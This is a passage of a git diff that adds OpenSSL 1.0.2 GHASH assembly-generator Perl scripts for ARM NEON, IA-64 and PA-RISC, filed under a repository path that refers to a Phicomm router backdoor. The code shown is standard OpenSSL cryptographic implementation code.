+
+#ifdef __ARMEL__
+	vrev64.8	$Xl,$Xl
+#endif
+	sub		$Xi,#16	
+	vst1.64		$Xl#hi,[$Xi,:64]!	@ write out Xi
+	vst1.64		$Xl#lo,[$Xi,:64]
+
+	ret					@ bx lr
+.size	gcm_ghash_neon,.-gcm_ghash_neon
+#endif
+___
+}
+$code.=<<___;
+.asciz  "GHASH for ARMv4/NEON, CRYPTOGAMS by <appro\@openssl.org>"
+.align  2
+___
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/geo;
+
+	s/\bq([0-9]+)#(lo|hi)/sprintf "d%d",2*$1+($2 eq "hi")/geo	or
+	s/\bret\b/bx	lr/go		or
+	s/\bbx\s+lr\b/.word\t0xe12fff1e/go;    # make it possible to compile with -march=armv4
+
+	print $_,"\n";
+}
+close STDOUT; # enforce flush
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-ia64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-ia64.pl
new file mode 100755
index 0000000..0354c95
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-ia64.pl
@@ -0,0 +1,463 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# March 2010
+#
+# The module implements "4-bit" GCM GHASH function and underlying
+# single multiplication operation in GF(2^128). "4-bit" means that it
+# uses 256 bytes per-key table [+128 bytes shared table]. Streamed
+# GHASH performance was measured to be 6.67 cycles per processed byte
+# on Itanium 2, which is >90% better than Microsoft compiler generated
+# code. To anchor to something else sha1-ia64.pl module processes one
+# byte in 5.7 cycles. On Itanium GHASH should run at ~8.5 cycles per
+# byte.
+
+# September 2010
+#
+# It was originally thought that it makes lesser sense to implement
+# "528B" variant on Itanium 2 for following reason. Because number of
+# functional units is naturally limited, it appeared impossible to
+# implement "528B" loop in 4 cycles, only in 5. This would mean that
+# theoretically performance improvement couldn't be more than 20%.
+# But occasionally you prove yourself wrong:-) I figured out a way to
+# fold couple of instructions and having freed yet another instruction
+# slot by unrolling the loop... Resulting performance is 4.45 cycles
+# per processed byte and 50% better than "256B" version. On original
+# Itanium performance should remain the same as the "256B" version,
+# i.e. ~8.5 cycles.
+
+$output=shift and (open STDOUT,">$output" or die "can't open $output: $!");
+
+if ($^O eq "hpux") {
+    $ADDP="addp4";
+    for (@ARGV) { $ADDP="add" if (/[\+DD|\-mlp]64/); }
+} else { $ADDP="add"; }
+for (@ARGV)  {  $big_endian=1 if (/\-DB_ENDIAN/);
+                $big_endian=0 if (/\-DL_ENDIAN/);  }
+if (!defined($big_endian))
+             {  $big_endian=(unpack('L',pack('N',1))==1);  }
+
+sub loop() {
+my $label=shift;
+my ($p16,$p17)=(shift)?("p63","p63"):("p16","p17"); # mask references to inp
+
+# Loop is scheduled for 6 ticks on Itanium 2 and 8 on Itanium, i.e.
+# in scalable manner;-) Naturally assuming data in L1 cache...
+# Special note about 'dep' instruction, which is used to construct
+# &rem_4bit[Zlo&0xf]. It works, because rem_4bit is aligned at 128
+# bytes boundary and lower 7 bits of its address are guaranteed to
+# be zero.
+$code.=<<___;
+$label:
+{ .mfi;	(p18)	ld8	Hlo=[Hi[1]],-8
+	(p19)	dep	rem=Zlo,rem_4bitp,3,4	}
+{ .mfi;	(p19)	xor	Zhi=Zhi,Hhi
+	($p17)	xor	xi[1]=xi[1],in[1]	};;
+{ .mfi;	(p18)	ld8	Hhi=[Hi[1]]
+	(p19)	shrp	Zlo=Zhi,Zlo,4		}
+{ .mfi;	(p19)	ld8	rem=[rem]
+	(p18)	and	Hi[1]=mask0xf0,xi[2]	};;
+{ .mmi;	($p16)	ld1	in[0]=[inp],-1
+	(p18)	xor	Zlo=Zlo,Hlo
+	(p19)	shr.u	Zhi=Zhi,4		}
+{ .mib;	(p19)	xor	Hhi=Hhi,rem
+	(p18)	add	Hi[1]=Htbl,Hi[1]	};;
+
+{ .mfi;	(p18)	ld8	Hlo=[Hi[1]],-8
+	(p18)	dep	rem=Zlo,rem_4bitp,3,4	}
+{ .mfi;	(p17)	shladd	Hi[0]=xi[1],4,r0
+	(p18)	xor	Zhi=Zhi,Hhi		};;
+{ .mfi;	(p18)	ld8	Hhi=[Hi[1]]
+	(p18)	shrp	Zlo=Zhi,Zlo,4		}
+{ .mfi;	(p18)	ld8	rem=[rem]
+	(p17)	and	Hi[0]=mask0xf0,Hi[0]	};;
+{ .mmi;	(p16)	ld1	xi[0]=[Xi],-1
+	(p18)	xor	Zlo=Zlo,Hlo
+	(p18)	shr.u	Zhi=Zhi,4		}
+{ .mib;	(p18)	xor	Hhi=Hhi,rem
+	(p17)	add	Hi[0]=Htbl,Hi[0]
+	br.ctop.sptk	$label			};;
+___
+}
+
+$code=<<___;
+.explicit
+.text
+
+prevfs=r2;	prevlc=r3;	prevpr=r8;
+mask0xf0=r21;
+rem=r22;	rem_4bitp=r23;
+Xi=r24;		Htbl=r25;
+inp=r26;	end=r27;
+Hhi=r28;	Hlo=r29;
+Zhi=r30;	Zlo=r31;
+
+.align	128
+.skip	16					// aligns loop body
+.global	gcm_gmult_4bit#
+.proc	gcm_gmult_4bit#
+gcm_gmult_4bit:
+	.prologue
+{ .mmi;	.save	ar.pfs,prevfs
+	alloc	prevfs=ar.pfs,2,6,0,8
+	$ADDP	Xi=15,in0			// &Xi[15]
+	mov	rem_4bitp=ip		}
+{ .mii;	$ADDP	Htbl=8,in1			// &Htbl[0].lo
+	.save	ar.lc,prevlc
+	mov	prevlc=ar.lc
+	.save	pr,prevpr
+	mov	prevpr=pr		};;
+
+	.body
+	.rotr	in[3],xi[3],Hi[2]
+
+{ .mib;	ld1	xi[2]=[Xi],-1			// Xi[15]
+	mov	mask0xf0=0xf0
+	brp.loop.imp	.Loop1,.Lend1-16};;
+{ .mmi;	ld1	xi[1]=[Xi],-1			// Xi[14]
+					};;
+{ .mii;	shladd	Hi[1]=xi[2],4,r0
+	mov	pr.rot=0x7<<16
+	mov	ar.lc=13		};;
+{ .mii;	and	Hi[1]=mask0xf0,Hi[1]
+	mov	ar.ec=3
+	xor	Zlo=Zlo,Zlo		};;
+{ .mii;	add	Hi[1]=Htbl,Hi[1]		// &Htbl[nlo].lo
+	add	rem_4bitp=rem_4bit#-gcm_gmult_4bit#,rem_4bitp
+	xor	Zhi=Zhi,Zhi		};;
+___
+	&loop	(".Loop1",1);
+$code.=<<___;
+.Lend1:
+{ .mib;	xor	Zhi=Zhi,Hhi		};;	// modulo-scheduling artefact
+{ .mib;	mux1	Zlo=Zlo,\@rev		};;
+{ .mib;	mux1	Zhi=Zhi,\@rev		};;
+{ .mmi;	add	Hlo=9,Xi;;			// ;; is here to prevent
+	add	Hhi=1,Xi		};;	// pipeline flush on Itanium
+{ .mib;	st8	[Hlo]=Zlo
+	mov	pr=prevpr,0x1ffff	};;
+{ .mib;	st8	[Hhi]=Zhi
+	mov	ar.lc=prevlc
+	br.ret.sptk.many	b0	};;
+.endp	gcm_gmult_4bit#
+___
+
+######################################################################
+# "528B" (well, "512B" actualy) streamed GHASH
+#
+$Xip="in0";
+$Htbl="in1";
+$inp="in2";
+$len="in3";
+$rem_8bit="loc0";
+$mask0xff="loc1";
+($sum,$rum) = $big_endian ? ("nop.m","nop.m") : ("sum","rum");
+
+sub load_htable() {
+    for (my $i=0;$i<8;$i++) {
+	$code.=<<___;
+{ .mmi;	ld8	r`16+2*$i+1`=[r8],16		// Htable[$i].hi
+	ld8	r`16+2*$i`=[r9],16	}	// Htable[$i].lo
+{ .mmi;	ldf8	f`32+2*$i+1`=[r10],16		// Htable[`8+$i`].hi
+	ldf8	f`32+2*$i`=[r11],16		// Htable[`8+$i`].lo
+___
+	$code.=shift	if (($i+$#_)==7);
+	$code.="\t};;\n"
+    }
+}
+
+$code.=<<___;
+prevsp=r3;
+
+.align	32
+.skip	16					// aligns loop body
+.global	gcm_ghash_4bit#
+.proc	gcm_ghash_4bit#
+gcm_ghash_4bit:
+	.prologue
+{ .mmi;	.save	ar.pfs,prevfs
+	alloc	prevfs=ar.pfs,4,2,0,0
+	.vframe	prevsp
+	mov	prevsp=sp
+	mov	$rem_8bit=ip		};;
+	.body
+{ .mfi;	$ADDP	r8=0+0,$Htbl
+	$ADDP	r9=0+8,$Htbl		}
+{ .mfi;	$ADDP	r10=128+0,$Htbl
+	$ADDP	r11=128+8,$Htbl		};;
+___
+	&load_htable(
+	"	$ADDP	$Xip=15,$Xip",		# &Xi[15]
+	"	$ADDP	$len=$len,$inp",	# &inp[len]
+	"	$ADDP	$inp=15,$inp",		# &inp[15]
+	"	mov	$mask0xff=0xff",
+	"	add	sp=-512,sp",
+	"	andcm	sp=sp,$mask0xff",	# align stack frame
+	"	add	r14=0,sp",
+	"	add	r15=8,sp");
+$code.=<<___;
+{ .mmi;	$sum	1<<1				// go big-endian
+	add	r8=256+0,sp
+	add	r9=256+8,sp		}
+{ .mmi;	add	r10=256+128+0,sp
+	add	r11=256+128+8,sp
+	add	$len=-17,$len		};;
+___
+for($i=0;$i<8;$i++) {	# generate first half of Hshr4[]
+my ($rlo,$rhi)=("r".eval(16+2*$i),"r".eval(16+2*$i+1));
+$code.=<<___;
+{ .mmi;	st8	[r8]=$rlo,16			// Htable[$i].lo
+	st8	[r9]=$rhi,16			// Htable[$i].hi
+	shrp	$rlo=$rhi,$rlo,4	}//;;
+{ .mmi;	stf8	[r10]=f`32+2*$i`,16		// Htable[`8+$i`].lo
+	stf8	[r11]=f`32+2*$i+1`,16		// Htable[`8+$i`].hi
+	shr.u	$rhi=$rhi,4		};;
+{ .mmi;	st8	[r14]=$rlo,16			// Htable[$i].lo>>4
+	st8	[r15]=$rhi,16		}//;;	// Htable[$i].hi>>4
+___
+}
+$code.=<<___;
+{ .mmi;	ld8	r16=[r8],16			// Htable[8].lo
+	ld8	r17=[r9],16		};;	// Htable[8].hi
+{ .mmi;	ld8	r18=[r8],16			// Htable[9].lo
+	ld8	r19=[r9],16		}	// Htable[9].hi
+{ .mmi;	rum	1<<5				// clear um.mfh
+	shrp	r16=r17,r16,4		};;
+___
+for($i=0;$i<6;$i++) {	# generate second half of Hshr4[]
+$code.=<<___;
+{ .mmi;	ld8	r`20+2*$i`=[r8],16		// Htable[`10+$i`].lo
+	ld8	r`20+2*$i+1`=[r9],16		// Htable[`10+$i`].hi
+	shr.u	r`16+2*$i+1`=r`16+2*$i+1`,4	};;
+{ .mmi;	st8	[r14]=r`16+2*$i`,16		// Htable[`8+$i`].lo>>4
+	st8	[r15]=r`16+2*$i+1`,16		// Htable[`8+$i`].hi>>4
+	shrp	r`18+2*$i`=r`18+2*$i+1`,r`18+2*$i`,4	}
+___
+}
+$code.=<<___;
+{ .mmi;	shr.u	r`16+2*$i+1`=r`16+2*$i+1`,4	};;
+{ .mmi;	st8	[r14]=r`16+2*$i`,16		// Htable[`8+$i`].lo>>4
+	st8	[r15]=r`16+2*$i+1`,16		// Htable[`8+$i`].hi>>4
+	shrp	r`18+2*$i`=r`18+2*$i+1`,r`18+2*$i`,4	}
+{ .mmi;	add	$Htbl=256,sp			// &Htable[0]
+	add	$rem_8bit=rem_8bit#-gcm_ghash_4bit#,$rem_8bit
+	shr.u	r`18+2*$i+1`=r`18+2*$i+1`,4	};;
+{ .mmi;	st8	[r14]=r`18+2*$i`		// Htable[`8+$i`].lo>>4
+	st8	[r15]=r`18+2*$i+1`	}	// Htable[`8+$i`].hi>>4
+___
+
+$in="r15";
+@xi=("r16","r17");
+@rem=("r18","r19");
+($Alo,$Ahi,$Blo,$Bhi,$Zlo,$Zhi)=("r20","r21","r22","r23","r24","r25");
+($Atbl,$Btbl)=("r26","r27");
+
+$code.=<<___;	# (p16)
+{ .mmi;	ld1	$in=[$inp],-1			//(p16) *inp--
+	ld1	$xi[0]=[$Xip],-1		//(p16) *Xi--
+	cmp.eq	p0,p6=r0,r0		};;	//	clear p6
+___
+push (@xi,shift(@xi)); push (@rem,shift(@rem));	# "rotate" registers
+
+$code.=<<___;	# (p16),(p17)
+{ .mmi;	ld1	$xi[0]=[$Xip],-1		//(p16) *Xi--
+	xor	$xi[1]=$xi[1],$in	};;	//(p17) xi=$xi[i]^inp[i]
+{ .mii;	ld1	$in=[$inp],-1			//(p16) *inp--
+	dep	$Atbl=$xi[1],$Htbl,4,4		//(p17) &Htable[nlo].lo
+	and	$xi[1]=-16,$xi[1]	};;	//(p17) nhi=xi&0xf0
+.align	32
+.LOOP:
+{ .mmi;
+(p6)	st8	[$Xip]=$Zhi,13
+	xor	$Zlo=$Zlo,$Zlo
+	add	$Btbl=$xi[1],$Htbl	};;	//(p17) &Htable[nhi].lo
+___
+push (@xi,shift(@xi)); push (@rem,shift(@rem));	# "rotate" registers
+
+$code.=<<___;	# (p16),(p17),(p18)
+{ .mmi;	ld8	$Alo=[$Atbl],8			//(p18) Htable[nlo].lo,&Htable[nlo].hi
+	ld8	$rem[0]=[$Btbl],-256		//(p18) Htable[nhi].lo,&Hshr4[nhi].lo
+	xor	$xi[1]=$xi[1],$in	};;	//(p17) xi=$xi[i]^inp[i]
+{ .mfi;	ld8	$Ahi=[$Atbl]			//(p18) Htable[nlo].hi
+	dep	$Atbl=$xi[1],$Htbl,4,4	}	//(p17) &Htable[nlo].lo
+{ .mfi;	shladd	$rem[0]=$rem[0],4,r0		//(p18) Htable[nhi].lo<<4
+	xor	$Zlo=$Zlo,$Alo		};;	//(p18) Z.lo^=Htable[nlo].lo
+{ .mmi;	ld8	$Blo=[$Btbl],8			//(p18) Hshr4[nhi].lo,&Hshr4[nhi].hi
+	ld1	$in=[$inp],-1		}	//(p16) *inp--
+{ .mmi;	xor	$rem[0]=$rem[0],$Zlo		//(p18) Z.lo^(Htable[nhi].lo<<4)
+	mov	$Zhi=$Ahi			//(p18) Z.hi^=Htable[nlo].hi
+	and	$xi[1]=-16,$xi[1]	};;	//(p17) nhi=xi&0xf0
+{ .mmi;	ld8	$Bhi=[$Btbl]			//(p18) Hshr4[nhi].hi
+	ld1	$xi[0]=[$Xip],-1		//(p16) *Xi--
+	shrp	$Zlo=$Zhi,$Zlo,8	}	//(p18) Z.lo=(Z.hi<<56)|(Z.lo>>8)
+{ .mmi;	and	$rem[0]=$rem[0],$mask0xff	//(p18) rem=($Zlo^(Htable[nhi].lo<<4))&0xff
+	add	$Btbl=$xi[1],$Htbl	};;	//(p17) &Htable[nhi]
+___
+push (@xi,shift(@xi)); push (@rem,shift(@rem));	# "rotate" registers
+
+for ($i=1;$i<14;$i++) {
+# Above and below fragments are derived from this one by removing
+# unsuitable (p??) instructions.
+$code.=<<___;	# (p16),(p17),(p18),(p19)
+{ .mmi;	ld8	$Alo=[$Atbl],8			//(p18) Htable[nlo].lo,&Htable[nlo].hi
+	ld8	$rem[0]=[$Btbl],-256		//(p18) Htable[nhi].lo,&Hshr4[nhi].lo
+	shr.u	$Zhi=$Zhi,8		}	//(p19) Z.hi>>=8
+{ .mmi;	shladd	$rem[1]=$rem[1],1,$rem_8bit	//(p19) &rem_8bit[rem]
+	xor	$Zlo=$Zlo,$Blo			//(p19) Z.lo^=Hshr4[nhi].lo
+	xor	$xi[1]=$xi[1],$in	};;	//(p17) xi=$xi[i]^inp[i]
+{ .mmi;	ld8	$Ahi=[$Atbl]			//(p18) Htable[nlo].hi
+	ld2	$rem[1]=[$rem[1]]		//(p19) rem_8bit[rem]
+	dep	$Atbl=$xi[1],$Htbl,4,4	}	//(p17) &Htable[nlo].lo
+{ .mmi;	shladd	$rem[0]=$rem[0],4,r0		//(p18) Htable[nhi].lo<<4
+	xor	$Zlo=$Zlo,$Alo			//(p18) Z.lo^=Htable[nlo].lo
+	xor	$Zhi=$Zhi,$Bhi		};;	//(p19) Z.hi^=Hshr4[nhi].hi
+{ .mmi;	ld8	$Blo=[$Btbl],8			//(p18) Hshr4[nhi].lo,&Hshr4[nhi].hi
+	ld1	$in=[$inp],-1			//(p16) *inp--
+	shl	$rem[1]=$rem[1],48	}	//(p19) rem_8bit[rem]<<48
+{ .mmi;	xor	$rem[0]=$rem[0],$Zlo		//(p18) Z.lo^(Htable[nhi].lo<<4)
+	xor	$Zhi=$Zhi,$Ahi			//(p18) Z.hi^=Htable[nlo].hi
+	and	$xi[1]=-16,$xi[1]	};;	//(p17) nhi=xi&0xf0
+{ .mmi;	ld8	$Bhi=[$Btbl]			//(p18) Hshr4[nhi].hi
+	ld1	$xi[0]=[$Xip],-1		//(p16) *Xi--
+	shrp	$Zlo=$Zhi,$Zlo,8	}	//(p18) Z.lo=(Z.hi<<56)|(Z.lo>>8)
+{ .mmi;	and	$rem[0]=$rem[0],$mask0xff	//(p18) rem=($Zlo^(Htable[nhi].lo<<4))&0xff
+	xor	$Zhi=$Zhi,$rem[1]		//(p19) Z.hi^=rem_8bit[rem]<<48
+	add	$Btbl=$xi[1],$Htbl	};;	//(p17) &Htable[nhi]
+___
+push (@xi,shift(@xi)); push (@rem,shift(@rem));	# "rotate" registers
+}
+
+$code.=<<___;	# (p17),(p18),(p19)
+{ .mmi;	ld8	$Alo=[$Atbl],8			//(p18) Htable[nlo].lo,&Htable[nlo].hi
+	ld8	$rem[0]=[$Btbl],-256		//(p18) Htable[nhi].lo,&Hshr4[nhi].lo
+	shr.u	$Zhi=$Zhi,8		}	//(p19) Z.hi>>=8
+{ .mmi;	shladd	$rem[1]=$rem[1],1,$rem_8bit	//(p19) &rem_8bit[rem]
+	xor	$Zlo=$Zlo,$Blo			//(p19) Z.lo^=Hshr4[nhi].lo
+	xor	$xi[1]=$xi[1],$in	};;	//(p17) xi=$xi[i]^inp[i]
+{ .mmi;	ld8	$Ahi=[$Atbl]			//(p18) Htable[nlo].hi
+	ld2	$rem[1]=[$rem[1]]		//(p19) rem_8bit[rem]
+	dep	$Atbl=$xi[1],$Htbl,4,4	};;	//(p17) &Htable[nlo].lo
+{ .mmi;	shladd	$rem[0]=$rem[0],4,r0		//(p18) Htable[nhi].lo<<4
+	xor	$Zlo=$Zlo,$Alo			//(p18) Z.lo^=Htable[nlo].lo
+	xor	$Zhi=$Zhi,$Bhi		};;	//(p19) Z.hi^=Hshr4[nhi].hi
+{ .mmi;	ld8	$Blo=[$Btbl],8			//(p18) Hshr4[nhi].lo,&Hshr4[nhi].hi
+	shl	$rem[1]=$rem[1],48	}	//(p19) rem_8bit[rem]<<48
+{ .mmi;	xor	$rem[0]=$rem[0],$Zlo		//(p18) Z.lo^(Htable[nhi].lo<<4)
+	xor	$Zhi=$Zhi,$Ahi			//(p18) Z.hi^=Htable[nlo].hi
+	and	$xi[1]=-16,$xi[1]	};;	//(p17) nhi=xi&0xf0
+{ .mmi;	ld8	$Bhi=[$Btbl]			//(p18) Hshr4[nhi].hi
+	shrp	$Zlo=$Zhi,$Zlo,8	}	//(p18) Z.lo=(Z.hi<<56)|(Z.lo>>8)
+{ .mmi;	and	$rem[0]=$rem[0],$mask0xff	//(p18) rem=($Zlo^(Htable[nhi].lo<<4))&0xff
+	xor	$Zhi=$Zhi,$rem[1]		//(p19) Z.hi^=rem_8bit[rem]<<48
+	add	$Btbl=$xi[1],$Htbl	};;	//(p17) &Htable[nhi]
+___
+push (@xi,shift(@xi)); push (@rem,shift(@rem));	# "rotate" registers
+
+$code.=<<___;	# (p18),(p19)
+{ .mfi;	ld8	$Alo=[$Atbl],8			//(p18) Htable[nlo].lo,&Htable[nlo].hi
+	shr.u	$Zhi=$Zhi,8		}	//(p19) Z.hi>>=8
+{ .mfi;	shladd	$rem[1]=$rem[1],1,$rem_8bit	//(p19) &rem_8bit[rem]
+	xor	$Zlo=$Zlo,$Blo		};;	//(p19) Z.lo^=Hshr4[nhi].lo
+{ .mfi;	ld8	$Ahi=[$Atbl]			//(p18) Htable[nlo].hi
+	xor	$Zlo=$Zlo,$Alo		}	//(p18) Z.lo^=Htable[nlo].lo
+{ .mfi;	ld2	$rem[1]=[$rem[1]]		//(p19) rem_8bit[rem]
+	xor	$Zhi=$Zhi,$Bhi		};;	//(p19) Z.hi^=Hshr4[nhi].hi
+{ .mfi;	ld8	$Blo=[$Btbl],8			//(p18) Htable[nhi].lo,&Htable[nhi].hi
+	shl	$rem[1]=$rem[1],48	}	//(p19) rem_8bit[rem]<<48
+{ .mfi;	shladd	$rem[0]=$Zlo,4,r0		//(p18) Z.lo<<4
+	xor	$Zhi=$Zhi,$Ahi		};;	//(p18) Z.hi^=Htable[nlo].hi
+{ .mfi;	ld8	$Bhi=[$Btbl]			//(p18) Htable[nhi].hi
+	shrp	$Zlo=$Zhi,$Zlo,4	}	//(p18) Z.lo=(Z.hi<<60)|(Z.lo>>4)
+{ .mfi;	and	$rem[0]=$rem[0],$mask0xff	//(p18) rem=($Zlo^(Htable[nhi].lo<<4))&0xff
+	xor	$Zhi=$Zhi,$rem[1]	};;	//(p19) Z.hi^=rem_8bit[rem]<<48
+___
+push (@xi,shift(@xi)); push (@rem,shift(@rem));	# "rotate" registers
+
+$code.=<<___;	# (p19)
+{ .mmi;	cmp.ltu	p6,p0=$inp,$len
+	add	$inp=32,$inp
+	shr.u	$Zhi=$Zhi,4		}	//(p19) Z.hi>>=4
+{ .mmi;	shladd	$rem[1]=$rem[1],1,$rem_8bit	//(p19) &rem_8bit[rem]
+	xor	$Zlo=$Zlo,$Blo			//(p19) Z.lo^=Hshr4[nhi].lo
+	add	$Xip=9,$Xip		};;	//	&Xi.lo
+{ .mmi;	ld2	$rem[1]=[$rem[1]]		//(p19) rem_8bit[rem]
+(p6)	ld1	$in=[$inp],-1			//[p16] *inp--
+(p6)	extr.u	$xi[1]=$Zlo,8,8		}	//[p17] Xi[14]
+{ .mmi;	xor	$Zhi=$Zhi,$Bhi			//(p19) Z.hi^=Hshr4[nhi].hi
+(p6)	and	$xi[0]=$Zlo,$mask0xff	};;	//[p16] Xi[15]
+{ .mmi;	st8	[$Xip]=$Zlo,-8
+(p6)	xor	$xi[0]=$xi[0],$in		//[p17] xi=$xi[i]^inp[i]
+	shl	$rem[1]=$rem[1],48	};;	//(p19) rem_8bit[rem]<<48
+{ .mmi;
+(p6)	ld1	$in=[$inp],-1			//[p16] *inp--
+	xor	$Zhi=$Zhi,$rem[1]		//(p19) Z.hi^=rem_8bit[rem]<<48
+(p6)	dep	$Atbl=$xi[0],$Htbl,4,4	}	//[p17] &Htable[nlo].lo
+{ .mib;
+(p6)	and	$xi[0]=-16,$xi[0]		//[p17] nhi=xi&0xf0
+(p6)	br.cond.dptk.many	.LOOP	};;
+
+{ .mib;	st8	[$Xip]=$Zhi		};;
+{ .mib;	$rum	1<<1				// return to little-endian
+	.restore	sp
+	mov	sp=prevsp
+	br.ret.sptk.many	b0	};;
+.endp	gcm_ghash_4bit#
+___
+$code.=<<___;
+.align	128
+.type	rem_4bit#,\@object
+rem_4bit:
+        data8	0x0000<<48, 0x1C20<<48, 0x3840<<48, 0x2460<<48
+        data8	0x7080<<48, 0x6CA0<<48, 0x48C0<<48, 0x54E0<<48
+        data8	0xE100<<48, 0xFD20<<48, 0xD940<<48, 0xC560<<48
+        data8	0x9180<<48, 0x8DA0<<48, 0xA9C0<<48, 0xB5E0<<48
+.size	rem_4bit#,128
+.type	rem_8bit#,\@object
+rem_8bit:
+	data1	0x00,0x00, 0x01,0xC2, 0x03,0x84, 0x02,0x46, 0x07,0x08, 0x06,0xCA, 0x04,0x8C, 0x05,0x4E
+	data1	0x0E,0x10, 0x0F,0xD2, 0x0D,0x94, 0x0C,0x56, 0x09,0x18, 0x08,0xDA, 0x0A,0x9C, 0x0B,0x5E
+	data1	0x1C,0x20, 0x1D,0xE2, 0x1F,0xA4, 0x1E,0x66, 0x1B,0x28, 0x1A,0xEA, 0x18,0xAC, 0x19,0x6E
+	data1	0x12,0x30, 0x13,0xF2, 0x11,0xB4, 0x10,0x76, 0x15,0x38, 0x14,0xFA, 0x16,0xBC, 0x17,0x7E
+	data1	0x38,0x40, 0x39,0x82, 0x3B,0xC4, 0x3A,0x06, 0x3F,0x48, 0x3E,0x8A, 0x3C,0xCC, 0x3D,0x0E
+	data1	0x36,0x50, 0x37,0x92, 0x35,0xD4, 0x34,0x16, 0x31,0x58, 0x30,0x9A, 0x32,0xDC, 0x33,0x1E
+	data1	0x24,0x60, 0x25,0xA2, 0x27,0xE4, 0x26,0x26, 0x23,0x68, 0x22,0xAA, 0x20,0xEC, 0x21,0x2E
+	data1	0x2A,0x70, 0x2B,0xB2, 0x29,0xF4, 0x28,0x36, 0x2D,0x78, 0x2C,0xBA, 0x2E,0xFC, 0x2F,0x3E
+	data1	0x70,0x80, 0x71,0x42, 0x73,0x04, 0x72,0xC6, 0x77,0x88, 0x76,0x4A, 0x74,0x0C, 0x75,0xCE
+	data1	0x7E,0x90, 0x7F,0x52, 0x7D,0x14, 0x7C,0xD6, 0x79,0x98, 0x78,0x5A, 0x7A,0x1C, 0x7B,0xDE
+	data1	0x6C,0xA0, 0x6D,0x62, 0x6F,0x24, 0x6E,0xE6, 0x6B,0xA8, 0x6A,0x6A, 0x68,0x2C, 0x69,0xEE
+	data1	0x62,0xB0, 0x63,0x72, 0x61,0x34, 0x60,0xF6, 0x65,0xB8, 0x64,0x7A, 0x66,0x3C, 0x67,0xFE
+	data1	0x48,0xC0, 0x49,0x02, 0x4B,0x44, 0x4A,0x86, 0x4F,0xC8, 0x4E,0x0A, 0x4C,0x4C, 0x4D,0x8E
+	data1	0x46,0xD0, 0x47,0x12, 0x45,0x54, 0x44,0x96, 0x41,0xD8, 0x40,0x1A, 0x42,0x5C, 0x43,0x9E
+	data1	0x54,0xE0, 0x55,0x22, 0x57,0x64, 0x56,0xA6, 0x53,0xE8, 0x52,0x2A, 0x50,0x6C, 0x51,0xAE
+	data1	0x5A,0xF0, 0x5B,0x32, 0x59,0x74, 0x58,0xB6, 0x5D,0xF8, 0x5C,0x3A, 0x5E,0x7C, 0x5F,0xBE
+	data1	0xE1,0x00, 0xE0,0xC2, 0xE2,0x84, 0xE3,0x46, 0xE6,0x08, 0xE7,0xCA, 0xE5,0x8C, 0xE4,0x4E
+	data1	0xEF,0x10, 0xEE,0xD2, 0xEC,0x94, 0xED,0x56, 0xE8,0x18, 0xE9,0xDA, 0xEB,0x9C, 0xEA,0x5E
+	data1	0xFD,0x20, 0xFC,0xE2, 0xFE,0xA4, 0xFF,0x66, 0xFA,0x28, 0xFB,0xEA, 0xF9,0xAC, 0xF8,0x6E
+	data1	0xF3,0x30, 0xF2,0xF2, 0xF0,0xB4, 0xF1,0x76, 0xF4,0x38, 0xF5,0xFA, 0xF7,0xBC, 0xF6,0x7E
+	data1	0xD9,0x40, 0xD8,0x82, 0xDA,0xC4, 0xDB,0x06, 0xDE,0x48, 0xDF,0x8A, 0xDD,0xCC, 0xDC,0x0E
+	data1	0xD7,0x50, 0xD6,0x92, 0xD4,0xD4, 0xD5,0x16, 0xD0,0x58, 0xD1,0x9A, 0xD3,0xDC, 0xD2,0x1E
+	data1	0xC5,0x60, 0xC4,0xA2, 0xC6,0xE4, 0xC7,0x26, 0xC2,0x68, 0xC3,0xAA, 0xC1,0xEC, 0xC0,0x2E
+	data1	0xCB,0x70, 0xCA,0xB2, 0xC8,0xF4, 0xC9,0x36, 0xCC,0x78, 0xCD,0xBA, 0xCF,0xFC, 0xCE,0x3E
+	data1	0x91,0x80, 0x90,0x42, 0x92,0x04, 0x93,0xC6, 0x96,0x88, 0x97,0x4A, 0x95,0x0C, 0x94,0xCE
+	data1	0x9F,0x90, 0x9E,0x52, 0x9C,0x14, 0x9D,0xD6, 0x98,0x98, 0x99,0x5A, 0x9B,0x1C, 0x9A,0xDE
+	data1	0x8D,0xA0, 0x8C,0x62, 0x8E,0x24, 0x8F,0xE6, 0x8A,0xA8, 0x8B,0x6A, 0x89,0x2C, 0x88,0xEE
+	data1	0x83,0xB0, 0x82,0x72, 0x80,0x34, 0x81,0xF6, 0x84,0xB8, 0x85,0x7A, 0x87,0x3C, 0x86,0xFE
+	data1	0xA9,0xC0, 0xA8,0x02, 0xAA,0x44, 0xAB,0x86, 0xAE,0xC8, 0xAF,0x0A, 0xAD,0x4C, 0xAC,0x8E
+	data1	0xA7,0xD0, 0xA6,0x12, 0xA4,0x54, 0xA5,0x96, 0xA0,0xD8, 0xA1,0x1A, 0xA3,0x5C, 0xA2,0x9E
+	data1	0xB5,0xE0, 0xB4,0x22, 0xB6,0x64, 0xB7,0xA6, 0xB2,0xE8, 0xB3,0x2A, 0xB1,0x6C, 0xB0,0xAE
+	data1	0xBB,0xF0, 0xBA,0x32, 0xB8,0x74, 0xB9,0xB6, 0xBC,0xF8, 0xBD,0x3A, 0xBF,0x7C, 0xBE,0xBE
+.size	rem_8bit#,512
+stringz	"GHASH for IA64, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+$code =~ s/mux1(\s+)\S+\@rev/nop.i$1 0x0/gm      if ($big_endian);
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-parisc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-parisc.pl
new file mode 100644
index 0000000..d5ad96b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-parisc.pl
@@ -0,0 +1,731 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
